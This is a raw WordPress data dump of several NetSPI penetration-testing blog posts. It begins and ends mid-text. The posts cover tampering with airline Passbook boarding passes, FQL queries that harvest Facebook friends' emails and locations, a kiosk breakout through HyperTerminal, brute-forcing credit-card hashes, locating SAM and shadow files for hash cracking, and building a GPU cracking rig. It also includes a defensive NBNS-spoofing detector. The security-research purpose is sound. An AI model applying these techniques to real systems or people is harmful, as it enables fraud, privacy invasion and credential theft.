This may not be mind-blowing new information, but hopefully this gives you some good ideas on other ways to utilize directory traversal vulnerabilities. [post_title] => SMB Attacks Through Directory Traversal [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => smb-attacks-through-directory-traversal [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:54 [post_modified_gmt] => 2021-04-13 00:05:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1133 [menu_order] => 722 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [60] => WP_Post Object ( [ID] => 1138 [post_author] => 10 [post_date] => 2013-11-15 07:00:34 [post_date_gmt] => 2013-11-15 07:00:34 [post_content] => I've covered hacking Passbook files in the past, but I've decided that it's now a good time to cover modifying boarding passes. To start things off, you should not replicate what I'm showing in this blog. Modifying your boarding passes could easily get you in trouble with the TSA, and no one has time for that. iOS 7 has made it a lot easier to export Passbook files, so I think it's time to point out some issues surrounding boarding passes in Passbook. First off, let's send ourselves a copy of a boarding pass. It's as simple as opening Passbook, opening the pass, and hitting the square in the bottom left corner of the pass. Boarding Once you've emailed the .pkpass file to yourself, right click on the file and extract (or unzip) the files. The .pkpass file is just a zip file with a different name. Bp This will result in the following files in the directory. Bp There will be two more files in there if you have Sky Priority. If you don't already have Sky Priority, the image files can be found here. These footer images are also used for the TSA Pre Check boarding passes. They just have the Pre Check logo appended to the right of the Sky Priority logo. So we have the boarding pass file. That's cool. What can we do with it? Well, if you have an Apple Developer's account ($99 - more info here), you can modify the boarding pass and email it back to yourself. There is a signature file required by iOS to trust the Passbook pass, that can only be generated with a proper Apple Developer's certificate, but that's something you get as an Apple developer. I have heard that this signature file is not required for loading Passbook files into the "Passbook for Android" application, but I have not seen it in practice. So if you're using the passes from an Android phone, there's a chance that you won't have to re-sign the pass. For this demonstration, we'll show how you can give yourself Sky Priority on a flight. All that you need to do is add the two Sky Priority images (linked above) to your directory and modify the pass.json file to say that you are in the SKY boarding zone. This can easily be done with a text editor. Here's what my pass.json file looks like after changing the boarding zone. Bp Note that I changed the "zone" parameter. If you felt so inclined, you could change your seat number. If you wanted to social engineer your way into first class, this would be a good way to start. Again, I don't recommend doing any of this. This would not change your boarding pass barcode (also modifiable in pass.json), which is "tamper evident" and is supposed to be signed by a Delta private key. I have not tested this, but if the airport barcode scanners are not checking the signature, you would be able to modify the barcode as well. Again, I have not tested this or seen it in practice, but I have seen documentation that states the security data (signature) is optional. There's more info on the barcode standard here. If you are going to re-sign the pass, you will also need to modify the passTypeIdentifier and teamIdentifier fields (in the pass.json) to match your Apple Developer's account. If these do not match your Apple info, the pass will not validate when you go to sign and/or use it. There's some more info on signing your first pass here. You'll also want to delete your manifest.json and signature files, as those were generated by the original pass signer. Your final directory will look like this: Bp At this point you will want to run the SignPass utility on the directory. Your output will look like this. Bp And you will end up with a .pkpass file that you can email to your iOS device. Boarding Now, let's say you wanted to make it easier to upgrade your priority for all of your flights. It would not be hard to make a script to listen on an email inbox for a .pkpass file, unzip it, modify it, re-sign it, and email the pass back to the sender. On that note, don't send me your boarding passes. I don't have this script set up and I don't want your boarding passes. This issue is not limited to Delta. Any app that uses Passbook, is vulnerable to pass tampering attacks. This has been a problem for a while. Now that Passbook allows easy exports of .pkpass files, messing with the files is a lot easier. [post_title] => Sky Prioritize Yourself [post_excerpt] => I've covered hacking Passbook files in the past, but I've decided that it's now a good time to cover modifying boarding passes. To start things... [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sky-prioritize-yourself [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:36 [post_modified_gmt] => 2021-06-08 21:51:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1138 [menu_order] => 726 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [61] => WP_Post Object ( [ID] => 1142 [post_author] => 10 [post_date] => 2013-10-21 07:00:39 [post_date_gmt] => 2013-10-21 07:00:39 [post_content] =>

A Primer on Facebook Email Privacy

Facebook has a long and storied history of having confusing security and privacy settings. As of lately, there are three different settings (that I can find) that you can configure to control access to your email address(es). Each of these settings control specific facets of your email address privacy, but in this post we will focus on the third setting in the screen shot below. These settings are responsible for your email privacy, both on your profile and for your friends being able to see your email. This setting can be found by going to your “About” section of your profile and editing your contact information. Fql The locks are the configuration settings for your emails being accessible (by friends or publicly) and the circles are the configuration settings for for your email showing up in your timeline. The default setting (that I’ve seen) for your email privacy on Facebook is set to “Friends”. Fql But this is kind of an odd setting to have, as you can’t access or look up a friends email through the web interface of Facebook (assuming it is hidden from the timeline/profile). From what I can tell, this setting is primarily available for importing your Facebook contacts to other services (Gmail, Yahoo, etc.). I find this interesting as most people assume that they have successfully hidden their email adress on Facebook when they choose to not display it on their profile. Most of my friends are currently hiding both email addresses (private and facebook.com addresses) or they are just showing their @facebook.com email address in their profile. However, very few of my friends have their private email address set as available to “Only Me.” The following walkthrough will go over how to enumerate your available Facebook friends’ email addresses by manipulating traffic from the iOS Facebook application.

The Attack

We’ve previously covered a few different attacks on the NetSPI blog regarding proxies and iOS apps. This will be yet another example of abusing permissions given to a mobile app to get access to data. The setup for this attack is pretty simple. We will be using the Burp proxy from Portswigger to intercept the iOS traffic. First, install the Portswigger CA on your iOS device. This is needed to intercept the SSL traffic. Next, proxy your iOS traffic through Burp, and start looking at and modifying/replaying application traffic. I won’t get into the full details here, but the official instructions for setting up the Burp Proxy are here - https://portswigger.net/burp/help/proxy_options_installingCAcert.html#iphone After opening up the Facebook application, we see the following request in the traffic when we go to look at our messages. Fql
GET /method/fql.multiquery?sdk=ios&queries=%7B%22group_conversations%22%3A%22SELECT%20thread_id%2C%20name%2C%20title%2C%20is_group_conversation%2C%20pic_hash%2C%20participants%2C%20%20thread_fbid%2C%20timestamp%20FROM%20unified_thread%20%20WHERE%20timestamp%20%3E%201378149789000%20and%20folder%3D%27inbox%27%20and%20is_group_conversation%3D1%20%20and%20not%20archived%20order%20by%20timestamp%20desc%20limit%203%20offset%200%22%2C%22group_conversation_participants_profile_pic_urls%22%3A%22SELECT%20id%2C%20size%2C%20url%20FROM%20square_profile_pic%20WHERE%20size%20IN%20%2888%2C%20148%29%20AND%20id%20IN%20%28SELECT%20participants.user_id%20FROM%20%23group_conversations%29%22%2C%22favoriteRanking-Groups%22%3A%22SELECT%20favorite_id%2C%20ordering%2C%20is_group%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%20and%20is_group%22%2C%22favorites%22%3A%22SELECT%20uid%2C%20is_pushable%2C%20has_messenger%2C%20last_active%20FROM%20user%20WHERE%20uid%20in%20%28SELECT%20favorite_id%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%29%22%2C%22favoriteRanking%22%3A%22SELECT%20favorite_id%2C%20ordering%2C%20is_group%20FROM%20messaging_favorite%20WHERE%20uid%3Dme%28%29%22%2C%22group_conversations_favorites%22%3A%22SELECT%20thread_id%2C%20name%2C%20title%2C%20is_group_conversation%2C%20%20pic_hash%2C%20participants%2C%20thread_fbid%2C%20timestamp%20FROM%20unified_thread%20WHERE%20thread_fbid%20IN%20%28select%20favorite_id%20from%20%23favoriteRankingGroups%29%22%2C%22group_conversation_participants%22%3A%22SELECT%20id%2C%20name%20FROM%20profile%20WHERE%20id%20IN%20%28SELECT%20participants.user_id%20FROM%20%23group_conversations%29%22%2C%22top_friends%22%3A%22SELECT%20uid%2C%20is_pushable%2C%20has_messenger%2C%20last_active%20FROM%20user%20WHERE%20uid%20in%20%28SELECT%20uid2%20FROM%20friend%20WHERE%20uid1%3Dme%28%29%20order%20by%20communication_rank%20desc%20LIMIT%2015%29%22%7D&sdk_version=2&access_token=REDACTED&format=json&locale=en_US HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* Cookie: REDACTED Connection: keep-alive Accept-Language: en-us User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B329 [FBAN/FBIOS;FBAV/6.4;FBBV/290891;FBDV/iPhone4,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1.3;FBSS/2; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/1]
This request selects your conversations along with the information about the people involved in the conversations. It’s a pretty complicated query, but we won’t care about that in a minute. If you want to use this as a tutorial, this is the request that you will want to right-click on and “send to repeater” in Burp. Here’s the unencoded query:
{"group_conversations":"SELECT thread_id, name, title, is_group_conversation, pic_hash, participants,  thread_fbid, timestamp FROM unified_thread  WHERE timestamp > 1378149789000 and folder='inbox' and is_group_conversation=1  and not archived order by timestamp desc limit 3 offset 0","group_conversation_participants_profile_pic_urls":"SELECT id, size, url FROM square_profile_pic WHERE size IN (88, 148) AND id IN (SELECT participants.user_id FROM #group_conversations)","favoriteRankingGroups":"SELECT favorite_id, ordering, is_group FROM messaging_favorite WHERE uid=me() and is_group","favorites":"SELECT uid, is_pushable, has_messenger, last_active FROM user WHERE uid in (SELECT favorite_id FROM messaging_favorite WHERE uid=me())","favoriteRanking":"SELECT favorite_id, ordering, is_group FROM messaging_favorite WHERE uid=me()","group_conversations_favorites":"SELECT thread_id, name, title, is_group_conversation,  pic_hash, participants, thread_fbid, timestamp FROM unified_thread WHERE thread_fbid IN (select favorite_id from #favoriteRankingGroups)","group_conversation_participants":"SELECT id, name FROM profile WHERE id IN (SELECT participants.user_id FROM #group_conversations)","top_friends":"SELECT uid, is_pushable, has_messenger, last_active FROM user WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me() order by communication_rank desc LIMIT 15)"}
What we’re going to do is make our own query to get more information about our friends. Returned in a nice easy to parse format. Here’s the query that we’re going to use to select our Friends’ email addresses: {" friends_email":"SELECT uid, email, contact_email FROM user WHERE uid in (SELECT uid2 FROM friend WHERE uid1=me())"} You will have to URL encode the spaces in the query, but you can just paste this over the previous query that we intercepted earlier (and passed to repeater) and URL encode it in Burp. This will select the Facebook User ID, and any email or contact email addresses associated with the account. The UID can also be handy for quickly pulling up someone’s account. i.e. https://www.facebook.com/4 Here’s a sample of what we get back from the query: [{"name":"friends_email","fql_result_set":[{"uid":13931306,"email":"karlu0040example.com","contact_email":"karlu0040example.com"}]}] So we can access our friends’ email addresses, this may not seem like a big deal for some people, but if you have friends like mine, then your friends may not want their real email address publically available through Facebook. If you can’t tell by the screen shot above, my friends appreciate their privacy. While we’re requesting stuff that your friends may not want you to have access to, let’s look at some other interesting info that you can access. Some of my personal favorites:
  • Location Data for check-ins:
    • {" friends_locations":"SELECT coords, message, timestamp FROM location_post WHERE author_uid in (SELECT uid2 FROM friend WHERE uid1=me())"}
  • Publicly liked pages:
    • {" URLs_liked":"SELECT url FROM url_like WHERE user_id =4"}
  • Events information:
    • {"z_events":"SELECT description, host FROM event WHERE creator=4"}
  • Friends of a friend:
    • {"friends_of":"SELECT+uid2+FROM+friend+WHERE+uid1=4"}
From the Facebook Developers page, here’s the schema that you can use to query FQL - https://developers.facebook.com/docs/reference/fql

Conclusion

I did reach out to Facebook about this issue, but since this is “intended” functionality, they were not very interested in hearing about this. The functionality of the email privacy setting doesn’t make a whole lot of sense, but I will be setting my email address to private for all of my accounts. [post_title] => Facebook Friends, Your Email Address Isn’t that Private [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => facebook-friends-your-email-address-isnt-that-private [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:34 [post_modified_gmt] => 2021-06-08 21:51:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1142 [menu_order] => 729 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [62] => WP_Post Object ( [ID] => 1148 [post_author] => 10 [post_date] => 2013-09-05 07:00:50 [post_date_gmt] => 2013-09-05 07:00:50 [post_content] =>

One of the easiest ways for us to capture and/or relay hashes on the network is through NBNS spoofing. We will primarily use Responder.py or the Metasploit nbns spoofing module . Both of these tools can be great for attackers to use during a pen test, but remediation options for fixing the underlying issues are limited. In response to a lack of available mitigation options, I’ve written a script to help identify NBNS spoofers on the network.

This script makes frequent NBNS requests for a non-existent host name (the default is NETSPITEST) and it then listens for NBNS responses. Since there shouldn’t be any responses for this host name, the listener will sit idle until a response is received. If a response is received, we will know that there’s a spoofer on the network. Once a spoofer is identified, email alerting and syslogging options are available to alert network administrators of the issue.

Example Usage:

sudo python spoofspotter.py -i 192.168.1.161 -b 192.168.1.255 -n NBNSHOSTQUERY -s 192.168.1.2 -e karl.fosaaen@example.com -f test.log

This example command will make custom queries for NBNSHOSTQUERY for the responder to respond to. It will send an email alert to karl.fosaaen@example.com when an attack is identified and responses will also be logged to test.log

Required arguments:

-i 192.168.1.110The IP of this host
-b 192.168.1.255The Broadcast IP of this host

Optional arguments:

-h, --help Show this help message and exit
-f /home/nbns.log,
-F /home/nbns.log
File name to save a log file
-S trueLog to local Syslog - this is pretty beta
-e you@example.comThe email to receive alerts at
-s 192.168.1.109Email Server to Send Emails to
-n EXAMPLEDOMAINThe string to query with NBNS, this should be unique
-R trueThe option to send Garbage SMB Auth requests to the attacker (not implemented yet)
-c trueContinue Emailing After a Detection, could lead to spam

Example Script Output:

$ sudo python spoofspotter.py -i 192.168.1.161 -b 192.168.1.255 -n testfakehostname -s 192.168.1.2 -e karl.fosaaen@netspi.com -f test.log
Starting NBNS Request Thread...
Starting UDP Response Server...
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:47.497274 from host 192.168.1.162
Email Sent
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:49.549245 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:51.600981 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:53.657044 from host 192.168.1.162
A spoofed NBNS response for testfakehostname was detected by 192.168.1.161 at 2013-09-04 12:03:55.721037 from host 192.168.1.162
^C
Stopping Server and Exiting...

The script is available out on NetSPI’s github page: https://github.com/NetSPI/SpoofSpotter

There is an additional option that I’m currently working on, to make your pen tester especially annoyed. The –R flag will set the SMB response option to try and authenticate with the spoofer’s system. Since the NBNS spoofing attacks are used to capture (or relay hashes), why not send the attacker some hashes. Why not send a ton of them and make the attacker take their time trying to crack them, or just overload their logs. This will probably annoy an attacker more than anything else, but anything to make their attack harder may give you extra time to respond.

On that note, it was a little difficult for me to write this tool, as I have a feeling it will come back to haunt me in a future pen test. Feel free to send me any comments or feedback on the script through this blog or through our github page.

Special thanks go out to our client who had the idea for this script.

[post_title] => Identifying Rogue NBNS Spoofers [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => identifying-rogue-nbns-spoofers [to_ping] => [pinged] => [post_modified] => 2021-05-03 20:18:24 [post_modified_gmt] => 2021-05-03 20:18:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1148 [menu_order] => 735 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) [63] => WP_Post Object ( [ID] => 1150 [post_author] => 10 [post_date] => 2013-08-20 07:00:41 [post_date_gmt] => 2013-08-20 07:00:41 [post_content] => Frequently during external and web application penetration tests, we run into SVN entries files on web servers. These files are sometimes created as part of the SVN commit process and can lead to the disclosure of files (and source-code) that has been added to the web directory. This can be especially impactful for assessments, where there may be vulnerable pages (and/or configuration files) that are not clearly advertised from the main web site (i.e.: admin_backdoor.jsp or web.config). The files are typically laid out in lists of files and directories followed by their type (dir, file) on the next line. registry dir admin_login.jsp file Additionally, there may be source files accessible through the svn-base files (i.e.: /.svn/text-base/ExamplePage.jsp.svn-base). You can consider these files like backups of the originals that (hopefully) won’t execute on the server. Sometimes, the server sees these files with their original extension (.jsp) and you may have trouble getting at the source. The entries files can typically be found in each directory that is used by SVN, as well as any subdirectories. So if a directory shows up in your entries list, it’s worth looking in that directory for another entries file. I got tired of manually going through each of these entries files, so I wrote a script to automate listing the files, source files, and directories into an HTML file. The script also goes into each identified directory to find more entries files to spider.

Script Usage:

SVNtoDIR   https://somewebsite.com/DIR/.svn/entries  SVNbaseDIR (optional)

Output:

The script will output a directory named after the directory that you’re starting in (i.e.: DIR), and in that directory will be an HTML file (DIR.html) that you can use to start navigating files. Links to the svn-base files are included on the page and show up with the .svn-base file extension. If you are familiar with the default Apache directory listing page, this should be pretty easy for you to navigate. I’ve also added sorting for the table, just click on Name or Type at the top. Additionally, I’ve added an option for a second parameter that you can use for outputting the .svn-base files to a directory. Be careful with this one, as you can potentially end up downloading the entire web root. The script is available out at the NetSPI GitHub - https://github.com/NetSPI/SVNentriesParser [post_title] => Parsing SVN Entries Files with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => parsing-svn-entries-files-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:52 [post_modified_gmt] => 2021-04-13 00:05:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1150 [menu_order] => 738 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [64] => WP_Post Object ( [ID] => 1152 [post_author] => 10 [post_date] => 2013-07-22 07:00:42 [post_date_gmt] => 2013-07-22 07:00:42 [post_content] => It’s not every day that we run into kiosks, terminals, etc. that have HyperTerminal as one of the available applications. This may be a corner case, but it’s another example to add to Scott’s blog about break out methods. In this example, we encountered a terminal setup, where the system was a fairly locked down Windows XP machine. HyperTerminal was one of the only applications in the start menu, and other functionality (shortcut keys, right-click, run) was not available. The method here is pretty simple, but now you can add HyperTerminal as another program to use for breaking out.

Steps to Exploit

First off, we want to open up HyperTerminal and create a new connection to write to. In this example, we’ll just use our non-connected COM1 port as a connection. This is pretty easy to set up, it’s more or less clicking next until you are dropped into the HyperTerminal window below.
Hyperterm
At this point, we will want to turn on the “Echo typed characters locally” setting, so we can see what we’re doing. This can be found under File -> Properties -> Settings Tab -> ASCII SetupHyperterm We will want to save the text that we’re typing to the HyperTerminal screen, so select Transfer, then Capture Text. Hyperterm Since the user we are using has rights to write to the startup folder, we are just going to save a batch file that will run at the user’s next logon (C:Documents and SettingsAll UsersStart MenuProgramsStartuptest.bat). You may not have rights to save there, but you might have access to save the file to another location that you could run the script from. Once the capture is started, type the command(s) that you want to run into the HyperTerminal window and stop the capture. Here we are just going to type cmd and stop, so that the script will pop up a cmd shell when we login. You have plenty of other possible programs that you could run here. Hyperterm We can see in the example screen that the test.bat file was saved to the startup folder and when the script is executed, a command shell pops up. Hyperterm

Conclusion

You may never have to use HyperTerminal to break out, but keep it in mind if you are locked out of other routes. For our sysadmin readers, don’t allow HyperTerminal on your terminals, kiosks, etc.
[post_title] => Quick! To the HyperTerminal [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => quick-to-the-hyperterminal [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:56 [post_modified_gmt] => 2021-06-08 21:47:56 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1152 [menu_order] => 740 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [65] => WP_Post Object ( [ID] => 1158 [post_author] => 10 [post_date] => 2013-06-13 07:00:07 [post_date_gmt] => 2013-06-13 07:00:07 [post_content] => As penetration testers, we are frequently engaged to do penetration tests for PCI compliance. As a part of these penetration tests, we look for cardholder data (Card Numbers, CVV, etc.) in files, network traffic, databases, and anywhere else we might be able to catch it. Often times, we will find hashes of credit card numbers along with the first six and/or last four numbers of the credit card number. Given that credit card numbers are a fixed length, this limits the keyspace that we need to use to brute force the hashes. The language in the PCI DSS is a little vague about how cardholder data needs to be hashed, but there is information in requirement 3.4 that helps. “Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches:
  • One-way hashes based on strong cryptography (hash must be of the entire PAN)
  • Truncation (hashing cannot be used to replace the truncated segment of PAN)
  • Index tokens and pads (pads must be securely stored)
  • Strong cryptography with associated key-management processes and procedure"
While this information is good, it does not ensure that the implementer of the hashing function is doing things correctly. “Strong cryptography” can be interpreted a number of different ways. One could argue that SHA256 is a strong hashing algorithm, therefore meeting the requirements. It does not take a significant amount of effort for us to try and brute force SHA256 hashes, so the strength of the algorithm is a moot point. This type of attack is actually called out as a footnote in the requirement. “Note: It is a relatively trivial effort for a malicious individual to reconstruct original PAN data if they have access to both the truncated and hashed version of a PAN. Where hashed and truncated versions of the same PAN are present in an entity‘s environment, additional controls should be in place to ensure that the hashed and truncated versions cannot be correlated to reconstruct the original PAN.” These “additional controls” could include salts for the hashes (frequently stored with the hash) or encrypting the truncated versions. There are a number of other potential controls that we could talk about, but that would be enough info for another post. Even with proper additional controls on the PAN data (truncated and hashed), the root of the issue is still the length of the card number and the limited keyspace that is needed for guessing the number. Given a (potentially) sixteen digit card number, the first six digits, and the last four digits, we are able to easily iterate through the  remaining six digits in a matter of minutes.  There are only a fixed number of IIN or BIN prefixes for cards (think the first 4-6 numbers of a card). These numbers are available online and pretty easy to find. Given a list of these numbers, we are able to reduce our cracking efforts for situations where hashes are only stored with the last four digits of the card number. Factoring in that credit card numbers are Luhn valid, this reduces the amount of effort that we have to go through to hash the credit card number guesses. Example Card Format: Cc For this example, we will use the TCF Debit Card BIN. With a million potential card numbers (000000 to 999999 for the middle digits) with a last four digits of 1234, there are 100,000 potential Luhn valid card numbers in this space. So as you can see in this case, the Luhn check cuts the cracking space down by ninety percent. As it turns out, this will be the case with any of the credit card numbers that you are brute forcing. Since the last (or check) digit can only be one of ten numbers (0-9), you are limiting the number of valid Luhn check numbers to one of the ten numbers. Simply put, this works because you are not brute forcing the check digit. Time wise, it takes about 30 minutes to get through this keyspace (for the example number above) on a 2.80 Ghz Intel Core i7 processor. I also ran this test with several other programs open, so your results may vary. In general practice, I’ve seen most hashes crack within two minutes.

Code

The code for cracking these hashes is actually quite simple. Read in the input file, iterate through the numbers that need guessing, and hash the Luhn valid numbers. If the guess hash matches your input hash, it will write out your results to your output file. There’s also a small block in here to read in a list of IIN/BINS to use when you need to do guessing on the first 4-6 card numbers. You will have to provide your own list of these. Below is some sample output with the full card numbers and hashes redacted. Each period represents a Luhn valid card number and is used to show the cracking status. Cc I’ve put the code out on the NetSPI GitHub for those who are interested: https://netspi.github.io/PS_CC_Checker/

Conclusion

The PCI DSS allows merchants to store partial card numbers, but not the full number. While the card number may not be stored in full, storing the hash of the card along with some of the digits allows an attacker to make educated guesses about the card number. This basically renders the hashing useless. While this is directly called out in requirement 3.4 of the DSS, we have found instances of hashes being stored with the truncated PAN data. Even without the truncated PAN data, the cracking effort for a card number hash is still reduced by the static IIN/BIN numbers associated with the card issuer. [post_title] => Cracking Credit Card Hashes with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-credit-card-hashes-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:32 [post_modified_gmt] => 2021-06-08 21:51:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1158 [menu_order] => 746 [post_type] => post [post_mime_type] => [comment_count] => 3 [filter] => raw ) [66] => WP_Post Object ( [ID] => 1160 [post_author] => 10 [post_date] => 2013-06-04 07:00:09 [post_date_gmt] => 2013-06-04 07:00:09 [post_content] => In the first blog of this series, we showed you how to set up the hardware for your own GPU cracking box. In the second blog of this series, we showed you how to set up the OS, drivers, and software for your own GPU cracking box. In this blog, we will simply go over common ways to get hashes along with methods and strategies for cracking the hashes. We will touch on most of these topics at a high level, and add links to help you get more information on each topic. Again, this is a pretty basic intro, but hopefully it will serve as a starter’s guide for those looking into password cracking.

Common Ways to Get Hashes

We could write an entire post on ways to capture these, but we will just touch on some high level common methods for getting the hashes.

LM/NTLM

One of the most common hashes that we crack are Windows LANMAN and/or NTLM hashes. For systems where you have file read rights on the SYSTEM and SAM files (local admin rights, web directory traversal, etc.), you will want to copy them off of the host for hash extraction. Windows XP/Vista/Server 2003 Paths:
  • C:WindowsSystem32configSAM
  • C:WindowsSystem32configSYSTEM
Windows 7 and Server 2008
  • C:WindowsSystem32configRegBackSAM
  • C:WindowsSystem32configRegBackSYSTEM
Once you have these files, there are a number of tools that you can use to extract the hashes. Personally, I just import the files into Cain and export the hashes. If you have a meterpreter session on the system and “nt-authoritysystem” rights on the host, you can easily run the smart_hashdump module to dump out the local password hashes. Dumping hashes on a Server 2008 domain controller can be a little trickier. Pauldotcom has a great writeup on the process. Additionally, you can get password hashes from the network with tools like responder and the smb_capture module in Metasploit. These can be captured in both LM and NTLM formats. The LM format can be cracked with a combination of rainbow tables and cracking. I’ve also automated that process with a script. The cracking of network NTLM hashes is now supported by OCLHashcat. Previously, Cain was the only tool (that I knew of) that could crack them, and Cain was doing CPU cracking, not GPU cracking.

Linux Hashes

Dumping hashes from Linux systems can be fairly straightforward for most systems. If you have root access on the host, you can use the unshadow tool to get the hashes out into a john compatible format. Often times you will have arbitrary file read access, where you will want to get the /etc/shadow and /etc/passwd files for offline cracking of the hashes.

Web App Hashes

Many web applications store their password hashes in their databases. So those hashes may end up getting compromised from SQL injection or other attacks. Web content management systems (wordpress, drupal, etc.), more specifically their plugins, are also common targets for SQL injection and other attacks that expose password hashes. These hashes can vary in format (MD5, SHA1, etc.) but most that I have seen are typically unsalted, making them easier to crack. While some web application hashes are salted, you may get lucky and find the salts in the database with the hashes. It’s not as common, but you may get lucky.

Cracking the Hashes

At this point we’re going to assume that you have taken the time to set up your hardware and software for cracking. If you want some tips, check out the links at the top of this post. For some of your cracking needs, you will want to start with a simple dictionary attack. This will quickly catch any of the simple or commonly used passwords in your hashes. Given a robust dictionary, a good rule set, and a solid cracking box, it can be pretty easy to crack a lot of passwords with little effort. Here’s some basic dictionaries to get you started:
  • Skull Security has a great list (including the Rockyou list) of dictionaries
  • Crackstation has a 15 GB dictionary available with pay what you want/can pricing
  • A uniqued copy of Wikipedia can make for an interesting dictionary
You will probably want to get some hashes for benchmarking your cards’ or CPU’s performance. There are tons of possible benchmarking hashes from the cracking requests sections on the InsidePro forums. Here you can frequently find large dumps of hashes from users requesting that someone crack their hashes for them. While the sources of these hashes are rarely disclosed, you could get a great sample of hashes to practice cracking. As for software, the three main pieces of cracking software that we use are Cain, John the Ripper, and OCLhashcat. I won’t include commands on how to run those, as those are very well documented other places.

Conclusion

Hopefully this blog has given you some tips on getting started on gathering and cracking hashes. If you have any questions on the hardware, software, or anything else, feel free to leave us a comment. [post_title] => GPU Cracking: Putting It All Together [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-putting-it-all-together [to_ping] => [pinged] => [post_modified] => 2023-06-13 09:53:36 [post_modified_gmt] => 2023-06-13 14:53:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1160 [menu_order] => 748 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [67] => WP_Post Object ( [ID] => 1166 [post_author] => 10 [post_date] => 2013-04-07 07:00:20 [post_date_gmt] => 2013-04-07 07:00:20 [post_content] =>

Intro

This winter, we decided to create our own dedicated GPU cracking solution to use for our assessments. It was quite the process, but we now have a fully functional hash cracking machine that tears through NTLMs at roughly 25 billion hashes per second (See below). While attempting to build this, we learned a lot about pushing the limits of consumer-grade hardware. We've recently updated this blog with more recent info - https://blog.netspi.com/gpu-cracking-rebuilding-box/

Goals

We set out to build a cracking rig with four high end video cards (AMD Radeon HD 7950) to run oclHashcat. We also wanted this solution to be rack mountable, so that it would be easy to store in our data center. As it turns out, there are not a ton of video card friendly server cases. We were only able to find a few GPU cracking friendly cases, but most of them cost more than the rest of our cracking hardware combined. If you have the money to spend, we would recommend going with the special case to save yourself from other issues, but this isn’t really an option for everyone. The reason why we recommend this is that the cards themselves do not take well to being lined up all together on a standard ATX motherboard. The fans tend to stick out further than they should and end up hitting the next card in the row. On top of that, the cramped conditions lead to overheating cards and cracking jobs stopping. The specialized cases have enough space to avoid these issues, making it easier to set up a box. We opted for an “open air” configuration for our cracking box. This was primarily driven by trying to mimic the setups of bitcoin mining rigs that we had seen online. I will say that this is not the prettiest option for housing all of these cards. However, it is one of the most efficient ways to space the cards out for cooling. With the “open air” setup, we’re able to connect riser cables to two of the cards and keep the other two cards down on the board. These riser cables can have their own problems. We ended up opting for one (16x to 1x) riser cable and a different (16x to 16x) riser cable that has some modifications for voltage. The 16x to 16x cable has a 12 volt molex adapter soldered to the 12 volt pins on the riser slot. GPU Cracker Blog 1 While this looks a little hackish, it actually works quite well. We had to do this to supplement the voltage from the motherboard, as it was unable to pull proper voltage for all four cards (with two riser cables). I should also mention that there is some crafty engineering taking place to suspend the two cards above the board. This was accomplished with several zip ties and a modified piece of wire-mesh shelving. GPU Cracker Blog 1 B I should also note that this whole rig is tied down (with stand-offs) to an old rack mount shelf. All in all, this setup works quite well. We can have all four cards running at full speed and the the hottest card will top out at 85° Celsius. We’re very aware of the fact that this looks insane. It’s hopefully a temporary solution. Eventually, we’re looking at securing a single rail to the rack to screw the cards into. As for performance, here’s our current averages for hash cracking (OCL in Brute-Force mode): MD5 – ~16000.0M/s NTLM – ~25500.0 M/s SHA1 – ~7900.0M/s  GPU Cracker Blog 1 C

5 Tips for Building Your Own

So if you’re planning on putting together your own GPU cracking rig, here’s some steps that you may want to take to make it easier.
  1. Look into a nice GPU server case and motherboard combo like this one https://www.newegg.com/Product/Product.aspx?Item=N82E16816152125
